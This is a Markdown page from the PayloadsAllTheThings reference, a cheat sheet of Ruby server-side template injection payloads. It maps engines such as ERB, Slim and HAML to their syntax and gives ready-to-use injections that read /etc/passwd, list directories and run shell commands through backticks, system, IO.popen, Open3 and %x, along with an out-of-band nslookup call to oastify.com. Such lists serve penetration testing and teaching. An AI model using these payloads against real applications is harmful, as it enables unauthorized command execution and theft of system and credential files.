PayloadsAllTheThings/Server Side Template Injection/Ruby.md
2024-11-02 17:42:18 +01:00

73 lines
1.4 KiB
Markdown

# Server Side Template Injection - Ruby
## Summary
- [Templating Libraries](#templating-libraries)
- [Ruby](#ruby)
- [Ruby - Basic injections](#ruby---basic-injections)
- [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
- [Ruby - List files and directories](#ruby---list-files-and-directories)
- [Ruby - Remote Command execution](#ruby---remote-Command-execution)
## Templating Libraries
| Template Name | Payload Format |
| ------------ | --------- |
| Erb | `<%= %>` |
| Erubi | `<%= %>` |
| Erubis | `<%= %>` |
| HAML | `#{ }` |
| Liquid | `{{ }}` |
| Mustache | `{{ }}` |
| Slim | `#{ }` |
## Ruby
### Ruby - Basic injections
**ERB**:
```ruby
<%= 7 * 7 %>
```
**Slim**:
```ruby
#{ 7 * 7 }
```
### Ruby - Retrieve /etc/passwd
```ruby
<%= File.open('/etc/passwd').read %>
```
### Ruby - List files and directories
```ruby
<%= Dir.entries('/') %>
```
### Ruby - Remote Command execution
Execute code using SSTI for **Erb**,**Erubi**,**Erubis** engine.
```ruby
<%=(`nslookup oastify.com`)%>
<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines() %>
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
```
Execute code using SSTI for **Slim** engine.
```powershell
#{ %x|env| }
```
---